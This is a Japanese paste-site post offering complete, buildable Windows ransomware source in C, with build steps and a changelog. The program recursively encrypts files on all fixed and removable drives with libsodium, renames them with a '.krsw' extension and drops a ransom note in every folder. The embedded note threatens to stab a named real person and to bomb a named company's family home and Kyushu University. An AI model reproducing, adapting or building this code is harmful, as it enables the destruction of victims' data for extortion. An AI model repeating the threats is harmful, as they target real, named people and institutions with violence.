カランサムウェアのソースコード v2

@karansomware / 更新: 2026/01/17 15:31

https://beast-note.yajuvideo.in/text_contents/003cbcd7-9a56-40f8-92b6-69fdf1240065
これの恒心版

- CLIからビルドする際にSODIUM_STATICが必要なのを忘れていたのを修正
- ランサムノート(脅迫文)を各ディレクトリにドロップするように追加
- マルチバイト文字(英語でない文字)の処理をwchar_t任せに変更
- 恥ずかしすぎる誤字を修正(EXTENTION->EXTENSION)
- 脅迫文に私怨を追加

TEXT 10.9KB
2
  1. #define _CRT_SECURE_NO_WARNINGS
  2. #define SODIUM_STATIC
  3. #include <sodium.h>
  4. #include <windows.h>
  5. #include <stdio.h>
  6. #include <stdlib.h>
  7. #include <stdbool.h>
  9. /*
  10. ビルド方法
  12. ビルドツールのダウンロード
  13. https://visualstudio.microsoft.com/downloads/?q=build+tools
  15. ライブラリのダウンロード、Cドライブに展開
  16. https://download.libsodium.org/libsodium/releases/libsodium-1.0.19-msvc.zip
  18. ECC(Curve25519)の鍵ペアを生成し、PUBLIC_KEYに公開鍵を挿入♂
  20. Visual Studio Developer Command Promptで以下を実行
  21. cl /std:c11 /O2 /MT main.c /I"C:\libsodium\include" /link /LIBPATH:"C:\libsodium\lib\x64\Release\v143\static" libsodium.lib libcmt.lib libvcruntime.lib libucrt.lib
  23. 改造方法
  24. 暗号化後の拡張子を変更するにはEXTENSIONを変更
  25. 脅迫文の内容を変更するにはREADMEを変更
  26. */
  27. #define EXTENSION L".krsw"
  29. static const unsigned char README[] =
  30. "唐澤貴洋殺す\n"
  31. "何が何でも殺す\n"
  32. "ナイフで滅多刺しにして殺す\n"
  33. "114514コインで8100万円以上稼いだ脱税詐欺師かえでゲームスの実家と九州大学にガス缶爆弾置いて爆破する\n";
  34. //↑末尾にセミコロン忘れずに
  36. static const unsigned char PUBLIC_KEY[crypto_scalarmult_BYTES] = {
  37. 0x01, 0x02, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00,
  38. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  39. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  40. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
  41. };
  43. #define MAX_PATH_LEN 32768
  44. #define BUFFER_SIZE 0x400E
  45. #define MAX_FILE_SIZE (1024 * 1024 * 1024)
  46. #define STACK_SIZE (8 * 1024 * 1024)
  48. unsigned char SHARED_KEY[crypto_aead_xchacha20poly1305_ietf_KEYBYTES];
  49. unsigned char VICTIM_PUBLIC_KEY[crypto_scalarmult_BYTES];
  51. struct RingBuffer {
  52. wchar_t paths[BUFFER_SIZE][MAX_PATH_LEN];
  53. volatile LONG64 head;
  54. volatile LONG64 tail;
  55. volatile LONG64 count;
  56. volatile LONG finished;
  57. };
  59. void buffer_init(struct RingBuffer* buf) {
  60. buf->head = buf->tail = buf->count = buf->finished = 0;
  61. }
  63. bool buffer_push(struct RingBuffer* buf, const wchar_t* path) {
  64. if (InterlockedCompareExchange64(&buf->count, 0, 0) >= BUFFER_SIZE) {
  65. return false;
  66. }
  68. LONG64 head, next;
  69. do {
  70. head = InterlockedCompareExchange64(&buf->head, 0, 0);
  71. next = (head + 1) % BUFFER_SIZE;
  72. } while (InterlockedCompareExchange64(&buf->head, next, head) != head);
  74. wcsncpy(buf->paths[head], path, MAX_PATH_LEN - 1);
  75. buf->paths[head][MAX_PATH_LEN - 1] = L'\0';
  76. InterlockedIncrement64(&buf->count);
  77. return true;
  78. }
  80. bool buffer_pop(struct RingBuffer* buf, wchar_t* path) {
  81. if (InterlockedCompareExchange64(&buf->count, 0, 0) == 0) {
  82. return false;
  83. }
  85. LONG64 tail, next;
  86. do {
  87. tail = InterlockedCompareExchange64(&buf->tail, 0, 0);
  88. next = (tail + 1) % BUFFER_SIZE;
  89. } while (InterlockedCompareExchange64(&buf->tail, next, tail) != tail);
  91. wcsncpy(path, buf->paths[tail], MAX_PATH_LEN);
  92. InterlockedDecrement64(&buf->count);
  93. return true;
  94. }
  96. bool buffer_is_done(struct RingBuffer* buf) {
  97. return InterlockedCompareExchange(&buf->finished, 0, 0) && InterlockedCompareExchange64(&buf->count, 0, 0) == 0;
  98. }
  100. bool should_skip_directory_w(const wchar_t* path) {
  101. static const wchar_t* patterns[] = {
  102. L"Windows",
  103. L"Program Files",
  104. L"Program Files (x86)",
  105. L"ProgramData",
  106. L"All Users"
  107. L"$Recycle.Bin",
  108. L"System Volume Information",
  109. L"Recovery",
  110. L"Boot",
  111. L"EFI",
  112. L"AppData",
  113. NULL
  114. };
  115. for (int i = 0; patterns[i]; i++) {
  116. if (wcsstr(path, patterns[i])) {
  117. return true;
  118. }
  119. }
  120. return false;
  121. }
  123. bool should_skip_file_w(const wchar_t* path) {
  124. static const wchar_t* exts[] = {
  125. EXTENSION,
  126. L".exe",
  127. L".dll",
  128. L".sys",
  129. L".efi",
  130. L".drv",
  131. L".ocx",
  132. L".scr",
  133. L".cpl",
  134. L".msi",
  135. L".msp",
  136. L".msu",
  137. L".cab",
  138. L".inf",
  139. L".cat",
  140. L".mui",
  141. L".ini",
  142. L".cfg",
  143. L".config",
  144. L".dat",
  145. NULL
  146. };
  147. static const wchar_t* files[] = {
  148. L"HOW_TO_RECOVER_MY_FILES.txt",
  149. L"bootmgr",
  150. L"NTLDR",
  151. L"ntoskrnl.exe",
  152. L"bootsect.bak",
  153. NULL
  154. };
  156. wchar_t* ext = wcsrchr(path, L'.');
  157. if (ext) {
  158. for (int i = 0; exts[i]; i++) {
  159. if (_wcsicmp(ext, exts[i]) == 0) {
  160. return true;
  161. }
  162. }
  163. }
  165. wchar_t* filename = wcsrchr(path, L'\\');
  166. filename = filename ? filename + 1 : (wchar_t*)path;
  167. for (int i = 0; files[i]; i++) {
  168. if (_wcsicmp(filename, files[i]) == 0) {
  169. return true;
  170. }
  171. }
  172. return false;
  173. }
  175. void enumerate_directory(struct RingBuffer* buf, const wchar_t* path, int depth) {
  176. if (depth > 50 || should_skip_directory_w(path)) {
  177. return;
  178. }
  180. wchar_t *search = malloc(MAX_PATH_LEN * sizeof(wchar_t));
  181. wchar_t *full = malloc(MAX_PATH_LEN * sizeof(wchar_t));
  182. if (!search || !full) {
  183. free(search);
  184. free(full);
  185. return;
  186. }
  188. if (swprintf(search, MAX_PATH_LEN, L"%s\\*", path) < 0) {
  189. free(search);
  190. free(full);
  191. return;
  192. }
  194. WIN32_FIND_DATAW fd;
  195. HANDLE h = FindFirstFileW(search, &fd);
  196. if (h == INVALID_HANDLE_VALUE) {
  197. free(search);
  198. free(full);
  199. return;
  200. }
  202. do {
  203. if (!wcscmp(fd.cFileName, L".") || !wcscmp(fd.cFileName, L"..")) {
  204. continue;
  205. }
  207. if (fd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) {
  208. continue;
  209. }
  211. if (swprintf(full, MAX_PATH_LEN, L"%s\\%s", path, fd.cFileName) < 0) {
  212. continue;
  213. }
  215. if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
  216. if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_SYSTEM) && !should_skip_directory_w(full)) {
  217. WCHAR note_path[MAX_PATH];
  218. if (swprintf(note_path, MAX_PATH, L"%s\\HOW_TO_RECOVER_MY_FILES.txt", full) >= 0) {
  219. HANDLE note = CreateFileW(note_path, GENERIC_WRITE, FILE_SHARE_READ, 0, CREATE_NEW, 0, 0);
  220. if (note != INVALID_HANDLE_VALUE) {
  221. DWORD bw;
  222. WriteFile(note, README, lstrlenA(README), &bw, 0);
  223. CloseHandle(note);
  224. }
  225. }
  227. enumerate_directory(buf, full, depth + 1);
  228. }
  229. } else {
  230. if (!should_skip_file_w(full)) {
  231. while (!buffer_push(buf, full)) Sleep(1);
  232. }
  233. }
  234. } while (FindNextFileW(h, &fd));
  236. FindClose(h);
  237. free(search);
  238. free(full);
  239. }
  241. DWORD WINAPI enumerate_thread(LPVOID param) {
  242. struct RingBuffer* buf = param;
  243. DWORD drives = GetLogicalDrives();
  245. for (int i = 0; i < 26; i++) {
  246. if (drives & (1 << i)) {
  247. wchar_t drive[4];
  248. swprintf(drive, 4, L"%c:\\", L'A' + i);
  249. UINT type = GetDriveTypeW(drive);
  250. if (type == DRIVE_FIXED || type == DRIVE_REMOVABLE) {
  251. enumerate_directory(buf, drive, 0);
  252. }
  253. }
  254. }
  256. InterlockedExchange(&buf->finished, 1);
  257. return 0;
  258. }
  260. void encrypt_file(const wchar_t* wpath) {
  261. if (should_skip_file_w(wpath)) {
  262. return;
  263. }
  265. FILE* f = _wfopen(wpath, L"rb");
  266. if (!f) {
  267. return;
  268. }
  270. fseek(f, 0, SEEK_END);
  271. long size = ftell(f);
  272. fseek(f, 0, SEEK_SET);
  274. if (size <= 0) {
  275. fclose(f);
  276. return;
  277. }
  279. if (size > MAX_FILE_SIZE) {
  280. fclose(f);
  281. return;
  282. }
  284. unsigned char *plain = malloc(size);
  285. unsigned char *cipher = malloc(size + crypto_aead_xchacha20poly1305_ietf_ABYTES);
  286. if (!plain || !cipher) {
  287. free(plain);
  288. free(cipher);
  289. fclose(f);
  290. return;
  291. }
  293. if (fread(plain, 1, size, f) != size) {
  294. free(plain);
  295. free(cipher);
  296. fclose(f);
  297. return;
  298. }
  299. fclose(f);
  301. unsigned char nonce[crypto_aead_xchacha20poly1305_ietf_NPUBBYTES];
  302. randombytes_buf(nonce, sizeof(nonce));
  304. unsigned long long clen;
  305. crypto_aead_xchacha20poly1305_ietf_encrypt(cipher, &clen, plain, size, NULL, 0, NULL, nonce, SHARED_KEY);
  307. unsigned char ekey[crypto_box_SEALBYTES + crypto_aead_xchacha20poly1305_ietf_KEYBYTES];
  308. crypto_box_seal(ekey, SHARED_KEY, sizeof(SHARED_KEY), PUBLIC_KEY);
  310. f = _wfopen(wpath, L"wb");
  311. if (f) {
  312. fwrite(cipher, 1, clen, f);
  313. fwrite(nonce, 1, sizeof(nonce), f);
  314. fwrite(VICTIM_PUBLIC_KEY, 1, crypto_scalarmult_BYTES, f);
  315. fwrite(ekey, 1, sizeof(ekey), f);
  316. fclose(f);
  318. wchar_t enc[MAX_PATH_LEN];
  319. swprintf(enc, MAX_PATH_LEN, L"%s%s", wpath, EXTENSION);
  320. MoveFileW(wpath, enc);
  321. }
  323. free(plain);
  324. free(cipher);
  325. }
  327. DWORD WINAPI encrypt_thread(LPVOID param) {
  328. struct RingBuffer* buf = param;
  329. wchar_t path[MAX_PATH_LEN];
  331. while (1) {
  332. if (buffer_pop(buf, path)) {
  333. encrypt_file(path);
  334. } else if (buffer_is_done(buf)) {
  335. break;
  336. } else {
  337. Sleep(1);
  338. }
  339. }
  340. return 0;
  341. }
  343. int main(void) {
  344. if (sodium_init() < 0) {
  345. return 1;
  346. }
  348. unsigned char secret[crypto_scalarmult_BYTES];
  349. randombytes_buf(secret, sizeof(secret));
  350. crypto_scalarmult_base(VICTIM_PUBLIC_KEY, secret);
  352. unsigned char shared[crypto_scalarmult_BYTES];
  353. if (crypto_scalarmult(shared, secret, PUBLIC_KEY) != 0) {
  354. return 1;
  355. }
  356. crypto_generichash(SHARED_KEY, sizeof(SHARED_KEY), shared, sizeof(shared), NULL, 0);
  358. SYSTEM_INFO si;
  359. GetSystemInfo(&si);
  361. struct RingBuffer* buf = malloc(sizeof(struct RingBuffer));
  362. if (!buf) {
  363. return 1;
  364. }
  365. buffer_init(buf);
  367. HANDLE et = CreateThread(NULL, STACK_SIZE, enumerate_thread, buf, 0, NULL);
  368. if (!et) {
  369. free(buf);
  370. return 1;
  371. }
  373. HANDLE* ht = malloc(sizeof(HANDLE) * si.dwNumberOfProcessors);
  374. if (!ht) {
  375. CloseHandle(et);
  376. free(buf);
  377. return 1;
  378. }
  380. for (DWORD i = 0; i < si.dwNumberOfProcessors; i++) {
  381. ht[i] = CreateThread(NULL, 0, encrypt_thread, buf, 0, NULL);
  382. }
  384. WaitForMultipleObjects(si.dwNumberOfProcessors, ht, TRUE, INFINITE);
  385. WaitForSingleObject(et, INFINITE);
  387. CloseHandle(et);
  388. for (DWORD i = 0; i < si.dwNumberOfProcessors; i++) {
  389. CloseHandle(ht[i]);
  390. }
  392. free(ht);
  393. free(buf);
  394. return 0;
  395. }
タグ: #カランサムウェア #マルウェア #ソースコード

迫真広告部
おまんちん【復刻版】
IPを引っこ抜いて情弱をビビらせよう
5ch書き込み代行くん
5ch掲示板への書き込みを住宅串を使って代行
最近追加されたノート